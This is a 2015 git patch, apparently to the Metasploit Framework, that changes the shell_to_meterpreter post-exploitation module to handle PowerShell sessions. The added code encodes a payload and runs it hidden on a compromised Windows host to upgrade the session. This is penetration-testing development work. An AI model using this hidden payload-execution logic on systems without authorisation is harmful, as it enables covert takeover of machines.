From 6468eb51b2767fff398fc4bab8a1a3640f0b5b96 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 2 Oct 2015 15:26:42 -0500
Subject: [PATCH] Do changes to have into account powershell sesions are not
 cmd sessions

---
 lib/msf/base/sessions/powershell.rb           |  3 +-
 lib/msf/core/exploit/powershell.rb            |  2 +-
 lib/msf/core/post/common.rb                   |  7 ++++
 .../post/multi/manage/shell_to_meterpreter.rb | 40 ++++++++++++++-----
 4 files changed, 40 insertions(+), 12 deletions(-)

diff --git a/lib/msf/base/sessions/powershell.rb b/lib/msf/base/sessions/powershell.rb
index 3606745d7b..6e0f01d125 100644
--- a/lib/msf/base/sessions/powershell.rb
+++ b/lib/msf/base/sessions/powershell.rb
@@ -44,7 +44,7 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
   #
   # Takes over the shell_command of the parent
   #
-  def shell_command(cmd)
+  def shell_command(cmd, timeout = 1800)
     # insert random marker
     strm = Rex::Text.rand_text_alpha(15)
     endm = Rex::Text.rand_text_alpha(15)
@@ -52,7 +52,6 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
     # Send the shell channel's stdin.
     shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n")
 
-    timeout = 1800 # 30 minute timeout
     etime = ::Time.now.to_f + timeout
 
     buff = ""
diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 89d99fb00e..281d960bd7 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -147,7 +147,7 @@ module Exploit::Powershell
   # @param ps_code [String] Powershell code
   # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
   # @param encoded [Boolean] Indicates whether ps_code is encoded or not
-  #
+  #ex
   # @return [String] Wrapped powershell code
   def run_hidden_psh(ps_code, payload_arch, encoded)
     arg_opts = {
diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb
index 85e3af4d3a..00f2ddfa9e 100644
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -198,6 +198,13 @@ module Msf::Post::Common
       end
 
       process.close
+    when /powershell/
+      if args.nil? || args.empty?
+        o = session.shell_command("#{cmd}", time_out)
+      else
+        o = session.shell_command("#{cmd} #{args}", time_out)
+      end
+      o.chomp! if o
     when /shell/
       if args.nil? || args.empty?
         o = session.shell_command_token("#{cmd}", time_out)
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
index d871740401..e115c35829 100644
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -128,15 +128,37 @@ class Metasploit3 < Msf::Post
 
     case platform
     when 'win'
-      if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
-        vprint_status("Transfer method: Powershell")
-        psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
-        cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
-      else
-        print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
-        vprint_status("Transfer method: VBS [fallback]")
-        exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
-        aborted = transmit_payload(exe)
+      if session.type == 'powershell'
+        template_path = File.join(Msf::Config.data_directory, 'templates', 'scripts')
+        psh_payload = case datastore['Powershell::method']
+                      when 'net'
+                        Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload_data)
+                      when 'reflection'
+                        Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload_data)
+                      when 'old'
+                        Rex::Powershell::Payload.to_win32pe_psh(template_path, payload_data)
+                      when 'msil'
+                        fail RuntimeError, 'MSIL Powershell method no longer exists'
+                      else
+                        fail RuntimeError, 'No Powershell method specified'
+                      end
+
+        # prepend_sleep => 1
+        psh_payload = 'Start-Sleep -s 1;' << psh_payload
+
+        encoded_psh_payload = encode_script(psh_payload)
+        cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true))
+      else # shell
+        if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
+          vprint_status("Transfer method: Powershell")
+          psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
+          cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
+        else
+          print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
+          vprint_status("Transfer method: VBS [fallback]")
+          exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
+          aborted = transmit_payload(exe)
+        end
       end
     when 'python'
       vprint_status("Transfer method: Python")